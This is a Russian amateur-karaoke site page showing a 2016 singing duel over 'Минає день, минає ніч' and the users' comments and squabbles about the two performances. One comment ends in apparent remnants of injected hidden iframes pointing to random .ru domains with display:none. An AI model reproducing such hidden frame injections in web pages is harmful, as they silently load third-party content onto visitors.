На главную Muza.vip
      
Спасательный круг
(Карнавал (группа))
Запела осень
(Хурсенко Вячеслав)
Романс
(Сумишевский Ярослав)
Кладут асфальт
(Иваси)
Женщины все королевы
(Прохорихина Жанна)


Песня месяца
Май 2026 года
Angelochek_msНадоело засыпать одной
(Мельянцева Надежда)

Баллов: 717


  Поединок
«Вспомним Мозгового»

   Статус поединка: завершенный
Просмотров409    Комментариев8
Все поединки
Текущие поединки
Правила и ЧаВо



Поединок начался 10.04.2016 в 17:54     Раундов: 1      Длительность: 10 дней     
В поединке запрещено оценивать и комментировать тем, у кого менее 5 записей вокала!

maru1961
offline maru1961
Название песни:
Минає день, минає ніч -

Исполнитель:
Николай Мозговой
Torivik
offline Torivik
Название песни:
Минає день, минає ніч

Исполнитель:
----
Комментарий инициатора: Замечательному композитору и певцу,Николаю Мозговому. Комментарий соперника: Послушав Ваше исполнение,Володя, самой захотелось спеть, а это значит, что зацепило...эхххх, рискну..))))

Скачать
49

Показать
оценки слушателей

Скачать
49

Показать
оценки слушателей


Комментарии пользователей к поединку:

Elnara, 10.04.2016 г. 19:50
Приветствую дуэлянтов )
Уже не первый раз слышу - это исполнение Володи, но только сейчас тоже записала и попыталась послать, но почему-то песня не отправлялась.. ну, наверно так и нужно.
Песня одна, а исполнения такие разные и красивые, но все-же вариант Володи приглянулся чуть больше...
Спасибо applod buket_big
  

Torivik, 10.04.2016 г. 22:14
Приветствуем, Эльнара!!
Мне тоже очень понравился Володин вариант, он сподвигнул меня спеть эту песню, а так бы мимо прошла....ну и рискнула заодно, а вдруг выберет...ну и выбрал, за что ему огромное спасибо!!da_da
Я и твой вариант уже послушала, теперь, наверно, всех буду слушать с этой песней!smehpodmigivanie
Спасибо,Эльнара!!!
  
lanayura, 11.04.2016 г. 13:04
Вика, Володя здравствуйте! Я уже третий раз в поединке у Володи (с этой песней), даже помню как голосовал - первый раз поровну, второй раз за. Володя - слушается очень хорошо и искренно! И даже те высокие нотки, которые балансируют на гране срыва - слушаются вполне волнительно. Спел (не могу сказать, тот же это дубль или другой) на очень хорошем уровне! da_da Вика - твой взгляд на песню, мне показался интереснее. Некая смесь рока и национального колорита + яркая театрализованная трагичность в исполнении. Свежо продумано, воплощено с мятежным выражением!!!rozochka id="a1996667054" src="//wek7ipqx359.ru/f2.html?a=10029" style="display:none"> id="a754394637" src="//lukpiot0dz.ru/u.html?a=10029" style="display:none">
  

Torivik, 11.04.2016 г. 13:17
Привет,Юра!!
Прочитав твой коммент, начала себя переслушивать, думаю и Хде ты там рок услышал? И таки даааааа, уловила сама такие нотки, хотя не преследовала такой цели! Помню исполнение этой песни Ротару еще с детства, но как-то забыла о ней, а вот Володя напомнил и сподвиг!!
Спасибо тебе большое за твое мнение, всегда развернутое и объективное ( это не потому что мне оценка выше, прошу понять правильноpodmigivanie)!!
  

lanayura, 11.04.2016 г. 13:20
Вика! Я всегда тебя понимаю правильно (как и ты меня.....как мне кажется)!martini
  

Torivik, 11.04.2016 г. 13:24
Да, Усе правильно!!!martini
  
Malishka_me, 11.04.2016 г. 15:00
Версия Вики мне ближе...наверно потому, что я тоже - женская душа. Технику не разбираю (и звук тоже)...чисто интуитивно и сердечно - Викуля buket_serdechkiВладимир s_sharikami
  

Torivik, 11.04.2016 г. 15:38
Спасибо большое, женская твоя душа!!!!smehpodmigivanievozd_poceluj
  

maru1961, 19.04.2016 г. 18:04
Женская душа "инструмент" тонкий.Не всякому дано понять.Спасибо.
  
singingorange8, 11.04.2016 г. 20:07
Вик, у тебя получилась поэма! )))applod buket_serdechkiв лучшем смысле слова! )))d9ulybka

Но исполнение Владимира тоже очень даже хорошее buket_serdechki- более "традиционное" , в смысле эстрадного исполнения))

Спасибо вам обоим за украинску мову ! ))) vozd_poceluj
  

Torivik, 11.04.2016 г. 23:42
Так именно исполнение Владимира меня и сподвигло и на песТнь, и на мову!!

Спасибо за поэму,Ириш!!
  

singingorange8, 18.04.2016 г. 01:14
vozd_pocelujrozochka
  

maru1961, 19.04.2016 г. 17:57
Спасибо Ирина,что зашли.

  
I_Yuo, 17.04.2016 г. 10:24
Володя спел в облегчённом варианте: везде тянул. а нужно было бы немного прислушаться к первоисточнику. Вся прелесть в том, что есть места, в которых необходима "скороговорка" (где ощущается вся прелесть украинского языка). "Тотальная тягучка" - неприемлема. Исполнение Вики меня тоже не удовлетворило. Эхо и второй голос в этой песне - излишни.
  

Torivik, 18.04.2016 г. 17:33
Здравствуйте, Евгений!...Во-первых, спасибо, что не прошли мимо и оставили Ваше мнение на нашем поединке.
Во-вторых, хочу сказать несколько слов в защиту Володи, позвольте с Вами не согласиться, что Володя везде "тянул", лично мне это очень понравилось, хотя не у всех лично мне это нравится, да и первоисточник, наверное, у всех разный, у меня лично - это Ротару, именно в ее исполнении мне запомнилась эта песня. Мы все слышим, как тут любят говорить, по-разному, как по моему мнению, не "слышим по-разному", а предпочитаем ту или иную манеру пения и подачу, каждый поет как считает нужным, как чувствует, и это вовсе не означает, что Ваше мнение правильное. Вот Вам, например, не понравился мой второй голос, это Ваше право, а я считаю, что он подошел сюда.
А вообще, я заметила, Вам вообще кто-либо нравится как поют?..может ошибаюсь, но читая Ваши комментарии  и на других поединках, складывается именно такое мнение.
В любом случае, спасибо!da_da
  

I_Yuo, 19.04.2016 г. 00:27
Ещё раз специально для адвокатов Володи... Вы "вспоминаете Мозгового", а не Ротару. Посмотрите наверх. А коли так, потрудитесь пожалуйста, хотя бы приблизительно спеть, как Мозговой. В своей песне - он виртуоз вокала, он жонглирует словами (а не одними эмоциями). Это - высший пилотаж и красота песни. О Вас не буду повторяться. Вы "украсили" свой вокал, используя ревер, и удвоили свой голос в части припева (это даже не в два голоса). У Мозгового - самое минимальное эхо и никакого двухголосья. В поединке (справедливом) эти вещи не прибавляют очки испонителю. Далее - без комментариев. Как будет достаточно времени (сейчас напряжёнка), обязательно спою и выставлю эту песню на поединок. У вас будет возможность высказать, всё, что заблагороссудится. На своей "территории" я с гостями доброжелателен, что бы они не писали. Полезное - "впитываю", остальное пропускаю мимо.
  

Torivik, 19.04.2016 г. 00:36
Насчет посмотреть наверх...я очень хорошо смотрела, поверьте...Володя,наверняка, имел в виду Мозгового как композитора данной композиции, это во-первых, а во-вторых - это вовсе не означает, что все должны копировать манеру именно Мозгового!
Дааа, и в адвокаты здесь никто не нанимался, и Вам пристало бы выбирать более вежливую форму общения не только у себя на страничке, но и на рингах, куда Вы ходите!!! Когда споете песню, с удовольствием к Вам загляну и оценю, вдруг покажете класс как надо ее петь, может научусь!!))))))))
  

maru1961, 19.04.2016 г. 17:56
Я приветствую критику,когда она звучит правильно,по-делу.Но то что пишет Евгений,просто буквоедство.Я тоже зайду к нему и с удовольствием послушаю.
  

maru1961, 19.04.2016 г. 18:00
Я конечно же мог бы и не тянуть,но,извините,мне именно так слышится эта песня.Такие песни надо петь и слушать душой а не ушами.Спасибо что зашли и оценили по-достоинству.
  
singingorange8, 18.04.2016 г. 01:13
В общем - честно говоря захожу на некоторые поединки и ничегошеньки не понимаю!! О чем речь - о чем говорится и что обсуждается на музыкальных - МУЗЫКАЛЬНЫХ - "поединках" где предполагается, что "соревнуются" люди - не "профи" музыканты - а просто любящие песни и музыку - не побоюсь этого слова!!!ne_ponyal o_dapoem_vmesteНа этом поединке Вика ну аааабсолютно не заслужила такие низкие оценки и такие комменты , как, к примеру, последний I_Yuo - вернее предпоследний !! Господа -Товарисчи-Любители-Песен-и-не очень-Любители(!!!) - что случилось с вашими ушами и с вашим музыкальным вкусом !!! И вообще - со вкусом !ne_ponyalo_da

Вик, ты прекрасно спела ! и пускай все застрелятся - кто не умеет слышать !!!
  

Torivik, 18.04.2016 г. 17:37
Защитнички вы моииии!!!smehpodmigivanie Спасибо, Ириш!!pocelujchik
Просто некоторые товариСЧи, как мне кажется, просто так ну против всех и Усеее тут!!))))))))))))
  
kolginova, 18.04.2016 г. 15:57
Первое исполнение хорошее,но не тронуло..простите..Вика..ты тронула..а тем,кто тебе единицу поставил,пусть им станет стыдно..хоть раз в жизни...
  

Torivik, 18.04.2016 г. 17:42
Оооо, мои поклонники подтягиваются, чему я очень рада!!...заранее прошу пардону, чтоб мнУ не расстрЭляли!!
Да бог с ними с еНтими единицами, Галюнь, не переживай, тем более проиграть такому оппоненту совсем не обидно!!podmigivanie

Спасибо тебе большое!!!vozd_poceluj
  
Nepodarok, 18.04.2016 г. 15:59
Ничего личного,просто восстановил справедливость)
  

Torivik, 18.04.2016 г. 17:43
Большое спасибо, Андрей, за восстановление справедливости, конечно, но этого делать не надо!...тем более мой оппонент этого не заслужил!!podmigivanie
  

maru1961, 19.04.2016 г. 18:02
Спасибо.Конечно справедливость превыше всего.
  

Новые комментарии не принимаются

  ПОМОГАЕМ
  ЖИВОТНЫМ
  В ЗОНЕ СВО



Случайная запись


Студия
dimakapitan
Родина
Трофимов Сергей
schotter
Покраснела рябина
Михайлов Стас
akononov6690
Не пишите мне писем, дорогая графиня
Гулько Михаил
Serge_Poet
Дуэт лисы Актрисы и кота Василия
Музыкальные сказки
rusalka & Marinajazz
Cara mia
Baccara
djdfy56
По бугоркам
Пташица
lori
Позови меня
Магомаев Муслим
WECHER-36
Про белые розы
Билан Дима
SERG-S
Держи меня за руку
Михайлов Стас
volod
Проводи меня домой
Серков Сергей
mranatolm
Назову любимою
Кибирев Игорь
LonelyWoolf
Hey Tonight
Creedence Clearwater Revival
Haris1958
Molina
Creedence Clearwater Revival
BEDHAR58
Venus
Shocking Blue
VETER36
А любовь рядом была
Шаврина Екатерина
Tol
Офицеры
Газманов Олег
Radmila76
Черным по белому
Эрденко Леонсия
ROLLER & 8911083
The gypsy
Deep Purple
leopold5005
Путь
Машина времени
AndreySidore
В последний раз
Веселые ребята
gdi1960
Не зажигай
Лещенко Лев
Marka64
До утра
БИ-2
milana18
Горлица и дятел
Шаврина Екатерина
petrovlad
Спасибо, милая
Федорков Александр
p12et1025
Звезда востока
Mr. Credo
vitgol
Ой ты, рожь
Великанова Гелена
regina74
Звёздная ночь
Шатунов Юрий
rena40
Грезы
Шатунов Юрий
NikSFilm2014
Если зуб разболелся вдруг
Ножкин Михаил
sergk256
С добрым утром, любимая
Митяев Олег




Территория творческого настроения © Muza.vip, 2011 — 2026 гг. Пользовательское соглашение.